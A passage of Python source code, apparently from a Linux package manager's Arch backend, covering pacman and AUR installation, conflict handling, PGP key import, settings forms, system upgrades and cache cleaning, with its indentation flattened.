self.logger.info("Downloading {} repository package(s)".format(len(pkgnames)))
output_handler = TransactionStatusHandler(handler.watcher, self.i18n, pkgnames, self.logger)
output_handler.start()
try:
success, _ = handler.handle_simple(pacman.download(root_password, *pkgnames), output_handler=output_handler.handle)
if success:
return len(pkgnames)
else:
raise ArchDownloadException()
except:
traceback.print_exc()
raise ArchDownloadException()
def _install(self, context: TransactionContext) -> bool:
pkgpaths = context.get_packages_paths()
context.watcher.change_substatus(self.i18n['arch.checking.conflicts'].format(bold(context.name)))
self.logger.info("Checking for possible conflicts with '{}'".format(context.name))
_, output = context.handler.handle_simple(pacman.install_as_process(pkgpaths=pkgpaths,
root_password=context.root_password,
pkgdir=context.project_dir or '.',
file=bool(context.install_files),
simulate=True),
notify_watcher=False)
self._update_progress(context, 70)
if 'unresolvable package conflicts detected' in output:
self.logger.info("Conflicts detected for '{}'".format(context.name))
conflict_msgs = RE_CONFLICT_DETECTED.findall(output)
conflicting_apps = {n.strip() for m in conflict_msgs for n in m.split(' and ')}
conflict_msg = ' {} '.format(self.i18n['and']).join([bold(c) for c in conflicting_apps])
if not context.watcher.request_confirmation(title=self.i18n['arch.install.conflict.popup.title'],
body=self.i18n['arch.install.conflict.popup.body'].format(conflict_msg)):
context.watcher.print(self.i18n['action.cancelled'])
return False
else: # uninstall conflicts
self._update_progress(context, 75)
names_to_install = context.get_package_names()
to_uninstall = {conflict for conflict in conflicting_apps if conflict not in names_to_install}
if to_uninstall:
self.logger.info("Preparing to uninstall conflicting packages: {}".format(to_uninstall))
context.watcher.change_substatus(self.i18n['arch.uninstalling.conflict'])
if context.removed is None:
context.removed = {}
to_install_replacements = pacman.map_replaces(names_to_install)
skip_requirement_checking = False
if to_install_replacements: # checking if the packages to be installed replace the installed packages
all_replacements = set()
for replacements in to_install_replacements:
all_replacements.update(replacements)
if all_replacements:
for pkg in to_uninstall:
if pkg not in all_replacements:
break
skip_requirement_checking = True
context.disable_progress_if_changing()
if not self._uninstall(names=to_uninstall, context=context, remove_unneeded=False,
disk_loader=context.disk_loader, skip_requirements=skip_requirement_checking):
context.watcher.show_message(title=self.i18n['error'],
body=self.i18n['arch.uninstalling.conflict.fail'].format(', '.join((bold(p) for p in to_uninstall))),
type_=MessageType.ERROR)
return False
else:
context.restabilish_progress()
else:
self.logger.info("No conflict detected for '{}'".format(context.name))
self._update_progress(context, 80)
to_install = []
if context.missing_deps:
to_install.extend((d[0] for d in context.missing_deps))
to_install.extend(pkgpaths)
downloaded = 0
if self._multithreaded_download_enabled(context.config):
to_download = [p for p in to_install if not p.startswith('/')]
if to_download:
try:
pkg_sizes = pacman.map_download_sizes(to_download)
downloaded = self._download_packages(to_download, context.handler, context.root_password, pkg_sizes, multithreaded=True)
except ArchDownloadException:
return False
if not context.dependency:
status_handler = TransactionStatusHandler(context.watcher, self.i18n, to_install, self.logger,
percentage=len(to_install) > 1,
downloading=downloaded) if not context.dependency else None
status_handler.start()
else:
status_handler = None
installed_with_same_name = self.read_installed(disk_loader=context.disk_loader, internet_available=True, names=context.get_package_names()).installed
context.watcher.change_substatus(self.i18n['arch.installing.package'].format(bold(context.name)))
installed = self._handle_install_call(context=context, to_install=to_install, status_handler=status_handler)
if status_handler:
status_handler.stop_working()
status_handler.join()
self._update_progress(context, 95)
if installed:
context.installed.update(context.get_package_names())
context.installed.update((p for p in to_install if not p.startswith('/')))
if installed_with_same_name:
for p in installed_with_same_name:
context.removed[p.name] = p
context.watcher.change_substatus(self.i18n['status.caching_data'].format(bold(context.name)))
if not context.maintainer:
if context.pkg and context.pkg.maintainer:
pkg_maintainer = context.pkg.maintainer
elif context.repository == 'aur':
aur_infos = self.aur_client.get_info({context.name})
pkg_maintainer = aur_infos[0].get('Maintainer') if aur_infos else None
else:
pkg_maintainer = context.repository
else:
pkg_maintainer = context.maintainer
cache_map = {context.name: ArchPackage(name=context.name,
repository=context.repository,
maintainer=pkg_maintainer,
last_modified=context.last_modified,
commit=context.commit,
categories=self.categories.get(context.name))}
if context.missing_deps:
aur_deps = {dep[0] for dep in context.missing_deps if dep[1] == 'aur'}
if aur_deps:
aur_data = self.aur_client.get_info(aur_deps)
if aur_data:
aur_data = {info['Name']: info for info in aur_data}
else:
aur_data = {n: {} for n in aur_deps}
else:
aur_data = None
for dep in context.missing_deps:
cache_map[dep[0]] = ArchPackage(name=dep[0],
repository=dep[1],
maintainer=dep[1] if dep[1] != 'aur' else (aur_data[dep[0]].get('Maintainer') if aur_data else None),
categories=self.categories.get(context.name))
disk.write_several(pkgs=cache_map, maintainer=None, overwrite=True)
context.watcher.change_substatus('')
self._update_progress(context, 100)
return installed
def _call_pacman_install(self, context: TransactionContext, to_install: List[str], overwrite_files: bool, status_handler: Optional[object] = None) -> Tuple[bool, str]:
return context.handler.handle_simple(pacman.install_as_process(pkgpaths=to_install,
root_password=context.root_password,
file=context.has_install_files(),
pkgdir=context.project_dir,
overwrite_conflicting_files=overwrite_files),
output_handler=status_handler.handle if status_handler else None)
def _handle_install_call(self, context: TransactionContext, to_install: List[str], status_handler) -> bool:
installed, output = self._call_pacman_install(context=context, to_install=to_install,
overwrite_files=False, status_handler=status_handler)
if not installed and 'conflicting files' in output:
if not context.handler.watcher.request_confirmation(title=self.i18n['warning'].capitalize(),
body=self.i18n['arch.install.error.conflicting_files'].format(bold(context.name)) + ':',
deny_label=self.i18n['arch.install.error.conflicting_files.proceed'],
confirmation_label=self.i18n['arch.install.error.conflicting_files.stop'],
components=self._map_conflicting_file(output)):
installed, output = self._call_pacman_install(context=context, to_install=to_install,
overwrite_files=True, status_handler=status_handler)
return installed
def _update_progress(self, context: TransactionContext, val: int):
if context.change_progress:
context.watcher.change_progress(val)
def _import_pgp_keys(self, pkgname: str, root_password: str, handler: ProcessHandler):
srcinfo = self.aur_client.get_src_info(pkgname)
if srcinfo.get('validpgpkeys'):
handler.watcher.print(self.i18n['arch.aur.install.verifying_pgp'])
keys_to_download = [key for key in srcinfo['validpgpkeys'] if not pacman.verify_pgp_key(key)]
if keys_to_download:
keys_str = ''.join(
['<br/><span style="font-weight:bold"> - {}</span>'.format(k) for k in keys_to_download])
msg_body = '{}:<br/>{}<br/><br/>{}'.format(self.i18n['arch.aur.install.pgp.body'].format(bold(pkgname)),
keys_str, self.i18n['ask.continue'])
if handler.watcher.request_confirmation(title=self.i18n['arch.aur.install.pgp.title'], body=msg_body):
for key in keys_to_download:
handler.watcher.change_substatus(self.i18n['arch.aur.install.pgp.substatus'].format(bold(key)))
if not handler.handle(pacman.receive_key(key, root_password)):
handler.watcher.show_message(title=self.i18n['error'],
body=self.i18n['arch.aur.install.pgp.receive_fail'].format(
bold(key)),
type_=MessageType.ERROR)
return False
if not handler.handle(pacman.sign_key(key, root_password)):
handler.watcher.show_message(title=self.i18n['error'],
body=self.i18n['arch.aur.install.pgp.sign_fail'].format(
bold(key)),
type_=MessageType.ERROR)
return False
handler.watcher.change_substatus(self.i18n['arch.aur.install.pgp.success'])
else:
handler.watcher.print(self.i18n['action.cancelled'])
return False
def _install_from_aur(self, context: TransactionContext) -> bool:
self._optimize_makepkg(context.config, context.watcher)
context.build_dir = '{}/build_{}'.format(get_build_dir(context.config), int(time.time()))
try:
if not os.path.exists(context.build_dir):
build_dir = context.handler.handle(SystemProcess(new_subprocess(['mkdir', '-p', context.build_dir])))
self._update_progress(context, 10)
if build_dir:
base_name = context.get_base_name()
context.watcher.change_substatus(self.i18n['arch.clone'].format(bold(base_name)))
cloned = context.handler.handle_simple(git.clone_as_process(url=URL_GIT.format(base_name), cwd=context.build_dir, depth=1))
if cloned:
self._update_progress(context, 40)
context.project_dir = '{}/{}'.format(context.build_dir, base_name)
return self._build(context)
finally:
if os.path.exists(context.build_dir) and context.config['aur_remove_build_dir']:
context.handler.handle(SystemProcess(new_subprocess(['rm', '-rf', context.build_dir])))
return False
def _sync_databases(self, arch_config: dict, aur_supported: bool, root_password: str, handler: ProcessHandler, change_substatus: bool = True):
if bool(arch_config['sync_databases']) and database.should_sync(arch_config, aur_supported, handler, self.logger):
if change_substatus:
handler.watcher.change_substatus(self.i18n['arch.sync_databases.substatus'])
synced, output = handler.handle_simple(pacman.sync_databases(root_password=root_password, force=True))
if synced:
database.register_sync(self.logger)
else:
self.logger.warning("It was not possible to synchronized the package databases")
handler.watcher.change_substatus(self.i18n['arch.sync_databases.substatus.error'])
def _optimize_makepkg(self, arch_config: dict, watcher: Optional[ProcessWatcher]):
if arch_config['optimize'] and not os.path.exists(CUSTOM_MAKEPKG_FILE):
watcher.change_substatus(self.i18n['arch.makepkg.optimizing'])
ArchCompilationOptimizer(i18n=self.i18n, logger=self.context.logger, taskman=TaskManager()).optimize()
def install(self, pkg: ArchPackage, root_password: str, disk_loader: Optional[DiskCacheLoader], watcher: ProcessWatcher, context: TransactionContext = None) -> TransactionResult:
self.aur_client.clean_caches()
if not self._check_action_allowed(pkg, watcher):
return TransactionResult(success=False, installed=[], removed=[])
handler = ProcessHandler(watcher) if not context else context.handler
if self._is_database_locked(handler, root_password):
return TransactionResult(success=False, installed=[], removed=[])
if context:
install_context = context
else:
install_context = TransactionContext.gen_context_from(pkg=pkg, handler=handler, arch_config=self.configman.get_config(),
root_password=root_password)
install_context.skip_opt_deps = False
install_context.disk_loader = disk_loader
install_context.update_aur_index = pkg.repository == 'aur'
self._sync_databases(arch_config=install_context.config, aur_supported=install_context.aur_supported,
root_password=root_password, handler=handler)
if pkg.repository == 'aur':
res = self._install_from_aur(install_context)
else:
res = self._install_from_repository(install_context)
if res:
pkg.name = install_context.name # changes the package name in case the PKGBUILD was edited
if os.path.exists(pkg.get_disk_data_path()):
with open(pkg.get_disk_data_path()) as f:
data = f.read()
if data:
data = json.loads(data)
pkg.fill_cached_data(data)
if install_context.new_pkg and install_context.config['edit_aur_pkgbuild'] is not False and pkg.repository == 'aur':
if install_context.pkgbuild_edited:
pkg.pkgbuild_editable = self._add_as_editable_pkgbuild(pkg.name)
else:
pkg.pkgbuild_editable = not self._remove_from_editable_pkgbuilds(pkg.name)
installed = []
if res and disk_loader and install_context.installed:
installed.append(pkg)
installed_to_load = []
if len(install_context.installed) > 1:
installed_to_load.extend({i for i in install_context.installed if i != pkg.name})
if installed_to_load:
installed_loaded = self.read_installed(disk_loader=disk_loader,
names=installed_to_load,
internet_available=True).installed
if installed_loaded:
installed.extend(installed_loaded)
if len(installed_loaded) + 1 != len(install_context.installed):
missing = ','.join({p for p in installed_loaded if p.name not in install_context.installed})
self.logger.warning("Could not load all installed packages. Missing: {}".format(missing))
removed = [*install_context.removed.values()] if install_context.removed else []
return TransactionResult(success=res, installed=installed, removed=removed)
def _install_from_repository(self, context: TransactionContext) -> bool:
try:
missing_deps = self._list_missing_deps(context)
except PackageNotFoundException:
self.logger.error("Package '{}' was not found")
return False
if missing_deps is None:
return False # called off by the user
if missing_deps:
if any((dep for dep in missing_deps if dep[1] == 'aur')):
context.watcher.show_message(title=self.i18n['error'].capitalize(),
body=self.i18n['arch.install.repo_pkg.error.aur_deps'],
type_=MessageType.ERROR)
return False
context.missing_deps = missing_deps
context.watcher.change_substatus(self.i18n['arch.missing_deps_found'].format(bold(context.name)))
if not confirmation.request_install_missing_deps(context.name, missing_deps, context.watcher, self.i18n):
context.watcher.print(self.i18n['action.cancelled'])
return False
res = self._install(context)
if res and not context.skip_opt_deps:
self._update_progress(context, 100)
return self._install_optdeps(context)
return res
def _is_wget_available(self) -> bool:
return bool(shutil.which('wget'))
def is_enabled(self) -> bool:
return self.enabled
def set_enabled(self, enabled: bool):
self.enabled = enabled
def can_work(self) -> bool:
try:
return self.arch_distro and pacman.is_available() and self._is_wget_available()
except FileNotFoundError:
return False
def cache_to_disk(self, pkg: ArchPackage, icon_bytes: bytes, only_icon: bool):
pass
def requires_root(self, action: SoftwareAction, pkg: ArchPackage) -> bool:
if action == SoftwareAction.PREPARE:
arch_config = self.configman.get_config()
aur_supported = (pkg and pkg.repository == 'aur') or aur.is_supported(arch_config)
if RefreshMirrors.should_synchronize(arch_config, aur_supported, self.logger):
return True
return SyncDatabases.should_sync(mirrors_refreshed=False, arch_config=arch_config,
aur_supported=aur_supported, logger=self.logger)
return action != SoftwareAction.SEARCH
def _start_category_task(self, taskman: TaskManager, create_config: CreateConfigFile, downloader: CategoriesDownloader):
taskman.update_progress('arch_aur_cats', 0, self.i18n['task.waiting_task'].format(bold(create_config.task_name)))
create_config.join()
arch_config = create_config.config
downloader.expiration = arch_config['categories_exp'] if isinstance(arch_config['categories_exp'], int) else None
taskman.update_progress('arch_aur_cats', 50, None)
def _finish_category_task(self, taskman: TaskManager):
taskman.update_progress('arch_aur_cats', 100, None)
taskman.finish_task('arch_aur_cats')
def prepare(self, task_manager: TaskManager, root_password: str, internet_available: bool):
create_config = CreateConfigFile(taskman=task_manager, configman=self.configman, i18n=self.i18n,
task_icon_path=get_icon_path(), logger=self.logger)
create_config.start()
if internet_available:
self.index_aur = AURIndexUpdater(context=self.context, taskman=task_manager, create_config=create_config) # must always execute to properly determine the installed packages (even that AUR is disabled)
self.index_aur.start()
refresh_mirrors = RefreshMirrors(taskman=task_manager, i18n=self.i18n, root_password=root_password,
logger=self.logger, create_config=create_config)
refresh_mirrors.start()
SyncDatabases(taskman=task_manager, root_password=root_password, i18n=self.i18n,
logger=self.logger, refresh_mirrors=refresh_mirrors, create_config=create_config).start()
ArchCompilationOptimizer(i18n=self.i18n, logger=self.context.logger,
taskman=task_manager, create_config=create_config).start()
self.disk_cache_updater = ArchDiskCacheUpdater(taskman=task_manager,
i18n=self.i18n,
logger=self.context.logger,
controller=self,
internet_available=internet_available,
aur_indexer=self.index_aur,
create_config=create_config)
self.disk_cache_updater.start()
task_manager.register_task('arch_aur_cats', self.i18n['task.download_categories'], get_icon_path())
cat_download = CategoriesDownloader(id_='Arch', http_client=self.context.http_client,
logger=self.context.logger,
manager=self, url_categories_file=URL_CATEGORIES_FILE,
categories_path=CATEGORIES_FILE_PATH,
internet_connection=internet_available,
internet_checker=self.context.internet_checker,
after=lambda: self._finish_category_task(task_manager))
cat_download.before = lambda: self._start_category_task(taskman=task_manager, create_config=create_config,
downloader=cat_download)
cat_download.start()
def list_updates(self, internet_available: bool) -> List[PackageUpdate]:
installed = self.read_installed(disk_loader=None, internet_available=internet_available).installed
aur_type, repo_type = self.i18n['gem.arch.type.aur.label'], self.i18n['gem.arch.type.arch_repo.label']
return [PackageUpdate(p.name, p.latest_version, aur_type if p.repository == 'aur' else repo_type, p.name) for p in installed if p.update and not p.is_update_ignored()]
def list_warnings(self, internet_available: bool) -> List[str]:
warnings = []
if self.arch_distro:
if not pacman.is_available():
warnings.append(self.i18n['arch.warning.disabled'].format(bold('pacman')))
if not self._is_wget_available():
warnings.append(self.i18n['arch.warning.disabled'].format(bold('wget')))
if not git.is_installed():
warnings.append(self.i18n['arch.warning.git'].format(bold('git')))
return warnings
def list_suggestions(self, limit: int, filter_installed: bool) -> List[PackageSuggestion]:
self.logger.info("Downloading suggestions file {}".format(SUGGESTIONS_FILE))
file = self.http_client.get(SUGGESTIONS_FILE)
if not file or not file.text:
self.logger.warning("No suggestion could be read from {}".format(SUGGESTIONS_FILE))
else:
self.logger.info("Mapping suggestions")
suggestions = {}
for l in file.text.split('\n'):
if l:
if limit <= 0 or len(suggestions) < limit:
lsplit = l.split('=')
name = lsplit[1].strip()
if not filter_installed or not pacman.check_installed(name):
suggestions[name] = SuggestionPriority(int(lsplit[0]))
api_res = self.aur_client.get_info(suggestions.keys())
if api_res:
res = []
for pkg in api_res:
if pkg.get('Name') in suggestions:
res.append(PackageSuggestion(self.aur_mapper.map_api_data(pkg, {}, self.categories), suggestions[pkg['Name']]))
self.logger.info("Mapped {} suggestions".format(len(suggestions)))
return res
def is_default_enabled(self) -> bool:
return True
def launch(self, pkg: ArchPackage):
if pkg.command:
subprocess.Popen(args=[pkg.command], shell=True, env={**os.environ})
def get_screenshots(self, pkg: SoftwarePackage) -> List[str]:
pass
def _gen_bool_selector(self, id_: str, label_key: str, tooltip_key: str, value: bool, max_width: int,
capitalize_label: bool = True, label_params: Optional[list] = None, tooltip_params: Optional[list] = None) -> SingleSelectComponent:
opts = [InputOption(label=self.i18n['yes'].capitalize(), value=True),
InputOption(label=self.i18n['no'].capitalize(), value=False)]
lb = self.i18n[label_key]
if label_params:
lb = lb.format(*label_params)
tip = self.i18n[tooltip_key]
if tooltip_params:
tip = tip.format(*tooltip_params)
return SingleSelectComponent(label=lb,
options=opts,
default_option=[o for o in opts if o.value == value][0],
max_per_line=len(opts),
type_=SelectViewType.RADIO,
tooltip=tip,
max_width=max_width,
id_=id_,
capitalize_label=capitalize_label)
def get_settings(self, screen_width: int, screen_height: int) -> ViewComponent:
arch_config = self.configman.get_config()
max_width = floor(screen_width * 0.25)
db_sync_start = self._gen_bool_selector(id_='sync_dbs_start',
label_key='arch.config.sync_dbs',
tooltip_key='arch.config.sync_dbs_start.tip',
value=bool(arch_config['sync_databases_startup']),
max_width=max_width)
db_sync_start.label += ' ({})'.format(self.i18n['initialization'].capitalize())
fields = [
self._gen_bool_selector(id_='repos',
label_key='arch.config.repos',
tooltip_key='arch.config.repos.tip',
value=bool(arch_config['repositories']),
max_width=max_width),
self._gen_bool_selector(id_='aur',
label_key='arch.config.aur',
tooltip_key='arch.config.aur.tip',
value=arch_config['aur'],
max_width=max_width,
capitalize_label=False),
self._gen_bool_selector(id_='opts',
label_key='arch.config.optimize',
tooltip_key='arch.config.optimize.tip',
value=bool(arch_config['optimize']),
label_params=['(AUR)'],
capitalize_label=False,
max_width=max_width),
self._gen_bool_selector(id_='rebuild_detector',
label_key='arch.config.aur_rebuild_detector',
tooltip_key='arch.config.aur_rebuild_detector.tip',
value=bool(arch_config['aur_rebuild_detector']),
label_params=['(AUR)'],
tooltip_params=["'rebuild-detector'"],
capitalize_label=False,
max_width=max_width),
self._gen_bool_selector(id_='rebuild_detector_no_bin',
label_key='arch.config.aur_rebuild_detector_no_bin',
label_params=['rebuild-detector'],
tooltip_key='arch.config.aur_rebuild_detector_no_bin.tip',
tooltip_params=['rebuild-detector', self.i18n['arch.config.aur_rebuild_detector'].format('')],
value=bool(arch_config['aur_rebuild_detector_no_bin']),
capitalize_label=False,
max_width=max_width),
self._gen_bool_selector(id_='autoprovs',
label_key='arch.config.automatch_providers',
tooltip_key='arch.config.automatch_providers.tip',
value=bool(arch_config['automatch_providers']),
max_width=max_width),
self._gen_bool_selector(id_='check_dependency_breakage',
label_key='arch.config.check_dependency_breakage',
tooltip_key='arch.config.check_dependency_breakage.tip',
value=bool(arch_config['check_dependency_breakage']),
max_width=max_width),
self._gen_bool_selector(id_='mthread_download',
label_key='arch.config.pacman_mthread_download',
tooltip_key='arch.config.pacman_mthread_download.tip',
value=arch_config['repositories_mthread_download'],
max_width=max_width,
capitalize_label=True),
self._gen_bool_selector(id_='sync_dbs',
label_key='arch.config.sync_dbs',
tooltip_key='arch.config.sync_dbs.tip',
value=bool(arch_config['sync_databases']),
max_width=max_width),
db_sync_start,
self._gen_bool_selector(id_='clean_cached',
label_key='arch.config.clean_cache',
tooltip_key='arch.config.clean_cache.tip',
value=bool(arch_config['clean_cached']),
max_width=max_width),
self._gen_bool_selector(id_='suggest_unneeded_uninstall',
label_key='arch.config.suggest_unneeded_uninstall',
tooltip_params=['"{}"'.format(self.i18n['arch.config.suggest_optdep_uninstall'])],
tooltip_key='arch.config.suggest_unneeded_uninstall.tip',
value=bool(arch_config['suggest_unneeded_uninstall']),
max_width=max_width),
self._gen_bool_selector(id_='suggest_optdep_uninstall',
label_key='arch.config.suggest_optdep_uninstall',
tooltip_key='arch.config.suggest_optdep_uninstall.tip',
value=bool(arch_config['suggest_optdep_uninstall']),
max_width=max_width),
self._gen_bool_selector(id_='ref_mirs',
label_key='arch.config.refresh_mirrors',
tooltip_key='arch.config.refresh_mirrors.tip',
value=bool(arch_config['refresh_mirrors_startup']),
max_width=max_width),
TextInputComponent(id_='mirrors_sort_limit',
label=self.i18n['arch.config.mirrors_sort_limit'],
tooltip=self.i18n['arch.config.mirrors_sort_limit.tip'],
only_int=True,
max_width=max_width,
value=arch_config['mirrors_sort_limit'] if isinstance(arch_config['mirrors_sort_limit'], int) else ''),
TextInputComponent(id_='aur_idx_exp',
label=self.i18n['arch.config.aur_idx_exp'] + ' (AUR)',
tooltip=self.i18n['arch.config.aur_idx_exp.tip'],
max_width=max_width,
only_int=True,
capitalize_label=False,
value=arch_config['aur_idx_exp'] if isinstance(arch_config['aur_idx_exp'], int) else ''),
new_select(id_='aur_build_only_chosen',
label=self.i18n['arch.config.aur_build_only_chosen'],
tip=self.i18n['arch.config.aur_build_only_chosen.tip'],
opts=[(self.i18n['yes'].capitalize(), True, None),
(self.i18n['no'].capitalize(), False, None),
(self.i18n['ask'].capitalize(), None, None),
],
value=arch_config['aur_build_only_chosen'],
max_width=max_width,
type_=SelectViewType.RADIO,
capitalize_label=False),
new_select(label=self.i18n['arch.config.edit_aur_pkgbuild'],
tip=self.i18n['arch.config.edit_aur_pkgbuild.tip'],
id_='edit_aur_pkgbuild',
opts=[(self.i18n['yes'].capitalize(), True, None),
(self.i18n['no'].capitalize(), False, None),
(self.i18n['ask'].capitalize(), None, None),
],
value=arch_config['edit_aur_pkgbuild'],
max_width=max_width,
type_=SelectViewType.RADIO,
capitalize_label=False),
self._gen_bool_selector(id_='aur_remove_build_dir',
label_key='arch.config.aur_remove_build_dir',
tooltip_key='arch.config.aur_remove_build_dir.tip',
value=bool(arch_config['aur_remove_build_dir']),
max_width=max_width,
capitalize_label=False),
FileChooserComponent(id_='aur_build_dir',
label=self.i18n['arch.config.aur_build_dir'],
tooltip=self.i18n['arch.config.aur_build_dir.tip'].format(BUILD_DIR),
max_width=max_width,
file_path=arch_config['aur_build_dir'],
capitalize_label=False,
directory=True),
TextInputComponent(id_='arch_cats_exp',
label=self.i18n['arch.config.categories_exp'],
tooltip=self.i18n['arch.config.categories_exp.tip'],
max_width=max_width,
only_int=True,
capitalize_label=False,
value=arch_config['categories_exp'] if isinstance(arch_config['categories_exp'], int) else ''),
]
return PanelComponent([FormComponent(fields, spaces=False, id_='root')])
def save_settings(self, component: PanelComponent) -> Tuple[bool, Optional[List[str]]]:
arch_config = self.configman.get_config()
form = component.get_form_component('root')
arch_config['repositories'] = form.get_single_select_component('repos').get_selected()
arch_config['optimize'] = form.get_single_select_component('opts').get_selected()
arch_config['aur_rebuild_detector'] = form.get_single_select_component('rebuild_detector').get_selected()
arch_config['aur_rebuild_detector_no_bin'] = form.get_single_select_component('rebuild_detector_no_bin').get_selected()
arch_config['sync_databases'] = form.get_single_select_component('sync_dbs').get_selected()
arch_config['sync_databases_startup'] = form.get_single_select_component('sync_dbs_start').get_selected()
arch_config['clean_cached'] = form.get_single_select_component('clean_cached').get_selected()
arch_config['refresh_mirrors_startup'] = form.get_single_select_component('ref_mirs').get_selected()
arch_config['mirrors_sort_limit'] = form.get_component('mirrors_sort_limit').get_int_value()
arch_config['repositories_mthread_download'] = form.get_component('mthread_download').get_selected()
arch_config['automatch_providers'] = form.get_single_select_component('autoprovs').get_selected()
arch_config['edit_aur_pkgbuild'] = form.get_single_select_component('edit_aur_pkgbuild').get_selected()
arch_config['aur_remove_build_dir'] = form.get_single_select_component('aur_remove_build_dir').get_selected()
arch_config['aur_build_dir'] = form.get_component('aur_build_dir').file_path
arch_config['aur_build_only_chosen'] = form.get_single_select_component('aur_build_only_chosen').get_selected()
arch_config['aur_idx_exp'] = form.get_component('aur_idx_exp').get_int_value()
arch_config['check_dependency_breakage'] = form.get_single_select_component('check_dependency_breakage').get_selected()
arch_config['suggest_optdep_uninstall'] = form.get_single_select_component('suggest_optdep_uninstall').get_selected()
arch_config['suggest_unneeded_uninstall'] = form.get_single_select_component('suggest_unneeded_uninstall').get_selected()
arch_config['categories_exp'] = form.get_component('arch_cats_exp').get_int_value()
if not arch_config['aur_build_dir']:
arch_config['aur_build_dir'] = None
aur_enabled_select = form.get_single_select_component('aur')
arch_config['aur'] = aur_enabled_select.get_selected()
if aur_enabled_select.changed() and arch_config['aur']:
self.index_aur = AURIndexUpdater(context=self.context, taskman=TaskManager(), arch_config=arch_config)
self.index_aur.start()
try:
self.configman.save_config(arch_config)
return True, None
except:
return False, [traceback.format_exc()]
def get_upgrade_requirements(self, pkgs: List[ArchPackage], root_password: str, watcher: ProcessWatcher) -> UpgradeRequirements:
self.aur_client.clean_caches()
arch_config = self.configman.get_config()
aur_supported = aur.is_supported(arch_config)
self._sync_databases(arch_config=arch_config, aur_supported=aur_supported,
root_password=root_password, handler=ProcessHandler(watcher), change_substatus=False)
summarizer = UpdatesSummarizer(aur_client=self.aur_client,
aur_supported=aur_supported,
i18n=self.i18n,
logger=self.logger,
deps_analyser=self.deps_analyser,
watcher=watcher)
try:
return summarizer.summarize(pkgs, root_password, arch_config)
except PackageNotFoundException:
pass # when nothing is returned, the upgrade is called off by the UI
def get_custom_actions(self) -> List[CustomSoftwareAction]:
actions = []
arch_config = self.configman.get_config()
if pacman.is_mirrors_available():
actions.append(self.custom_actions['ref_mirrors'])
actions.append(self.custom_actions['ref_dbs'])
actions.append(self.custom_actions['clean_cache'])
if bool(arch_config['repositories']):
actions.append(self.custom_actions['sys_up'])
if pacman.is_snapd_installed():
actions.append(self.custom_actions['setup_snapd'])
return actions
def fill_sizes(self, pkgs: List[ArchPackage]):
installed, new, all_names, installed_names = [], [], [], []
for p in pkgs:
if p.repository != 'aur':
all_names.append(p.name)
if p.installed:
installed.append(p)
installed_names.append(p.name)
else:
new.append(p)
new_sizes = pacman.map_update_sizes(all_names)
if new_sizes:
if new:
for p in new:
p.size = new_sizes.get(p.name)
if installed:
installed_sizes = pacman.get_installed_size(installed_names)
for p in installed:
p.size = installed_sizes.get(p.name)
new_size = new_sizes.get(p.name)
if p.size is None:
p.size = new_size
elif new_size is not None:
p.size = new_size - p.size
def upgrade_system(self, root_password: str, watcher: ProcessWatcher) -> bool:
# repo_map = pacman.map_repositories()
net_available = self.context.internet_checker.is_available()
installed = self.read_installed(limit=-1, only_apps=False, pkg_types=None, internet_available=net_available, disk_loader=None).installed
if not installed:
watcher.show_message(title=self.i18n['arch.custom_action.upgrade_system'],
body=self.i18n['arch.custom_action.upgrade_system.no_updates'],
type_=MessageType.INFO)
return False
to_update = [p for p in installed if p.repository != 'aur' and p.update]
if not to_update:
watcher.show_message(title=self.i18n['arch.custom_action.upgrade_system'],
body=self.i18n['arch.custom_action.upgrade_system.no_updates'],
type_=MessageType.INFO)
return False
# icon_path = get_repo_icon_path()
# pkg_opts, size = [], 0
# self.fill_sizes(to_update)
#
# for pkg in to_update:
# lb = '{} ( {} > {} ) - {}: {}'.format(pkg.name,
# pkg.version,
# pkg.latest_version,
# self.i18n['size'].capitalize(),
# '?' if pkg.size is None else get_human_size_str(pkg.size))
# pkg_opts.append(InputOption(label=lb,
# value=pkg.name,
# read_only=True,
# icon_path=icon_path))
#
# if pkg.size is not None:
# size += pkg.size
#
# pkg_opts.sort(key=lambda o: o.label)
# select = MultipleSelectComponent(label='',
# options=pkg_opts,
# default_options=set(pkg_opts))
# if watcher.request_confirmation(title=self.i18n['arch.custom_action.upgrade_system'],
# body="{}. {}: {}".format(self.i18n['arch.custom_action.upgrade_system.pkgs'],
# self.i18n['size'].capitalize(),
# get_human_size_str(size)),
# confirmation_label=self.i18n['proceed'].capitalize(),
# deny_label=self.i18n['cancel'].capitalize(),
# components=[select]):
# watcher.change_substatus(self.i18n['arch.custom_action.upgrade_system.substatus'])
handler = ProcessHandler(watcher)
if self._is_database_locked(handler, root_password):
return False
success, output = handler.handle_simple(pacman.upgrade_system(root_password))
if not success or 'error:' in output:
watcher.show_message(title=self.i18n['arch.custom_action.upgrade_system'],
body="An error occurred during the upgrade process. Check out the {}".format(
bold('Details')),
type_=MessageType.ERROR)
return False
else:
database.register_sync(self.logger)
msg = '<p>{}</p><br/>{}</p><p>{}</p>'.format(self.i18n['action.update.success.reboot.line1'],
self.i18n['action.update.success.reboot.line2'],
self.i18n['action.update.success.reboot.line3'])
watcher.request_reboot(msg)
return True
def clean_cache(self, root_password: str, watcher: ProcessWatcher) -> bool:
cache_dir = pacman.get_cache_dir()
if not cache_dir or not os.path.isdir(cache_dir):
watcher.show_message(title=self.i18n['arch.custom_action.clean_cache'].capitalize(),
body=self.i18n['arch.custom_action.clean_cache.no_dir'.format(bold(cache_dir))].capitalize(),
type_=MessageType.WARNING)
return True
text = '<p>{}.</p><p>{}.</p><p>{}.</p>'.format(self.i18n['arch.custom_action.clean_cache.msg1'],
self.i18n['arch.custom_action.clean_cache.msg2'],
self.i18n['arch.custom_action.clean_cache.msg3'])
if watcher.request_confirmation(title=self.i18n['arch.custom_action.clean_cache'].capitalize(),
body=text,
confirmation_label=self.i18n['clean'].capitalize(),
deny_label=self.i18n['cancel'].capitalize()):
handler = ProcessHandler(watcher)
rm = SimpleProcess(cmd=['rm', '-rf', cache_dir], root_password=root_password)
success, _ = handler.handle_simple(rm)
if success:
watcher.show_message(title=self.i18n['arch.custom_action.clean_cache'].capitalize(),
body=self.i18n['arch.custom_action.clean_cache.success'],
type_=MessageType.INFO)
mkcache = SimpleProcess(cmd=['mkdir', '-p', cache_dir], root_password=root_password)
handler.handle_simple(mkcache)
return True
else:
watcher.show_message(title=self.i18n['arch.custom_action.clean_cache'].capitalize(),
body=self.i18n['arch.custom_action.clean_cache.fail'],
type_=MessageType.ERROR)
return False
return True
def _list_ignored_updates(self) -> Set[str]:
ignored = set()
if os.path.exists(UPDATES_IGNORED_FILE):
with open(UPDATES_IGNORED_FILE) as f:
ignored_lines = f.readlines()
for line in ignored_lines:
if line:
line_clean = line.strip()
if line_clean:
